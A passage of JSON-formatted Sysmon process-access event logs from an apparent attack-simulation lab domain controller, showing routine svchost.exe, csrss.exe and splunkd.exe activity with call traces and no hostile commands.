Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2219,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.234\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CB-5F25-0000-001080060400}\r\nTargetProcessId: 3812\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.234","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CB-5F25-0000-001080060400}","TargetProcessId":"3812","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2220,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.234\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.234","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2221,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.234\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.234","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2222,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.234\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.234","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2223,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.234\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.234","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2224,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.234\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.234","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2225,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.234\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.234","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2226,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.234\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:51.234","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2227,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:51.234\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 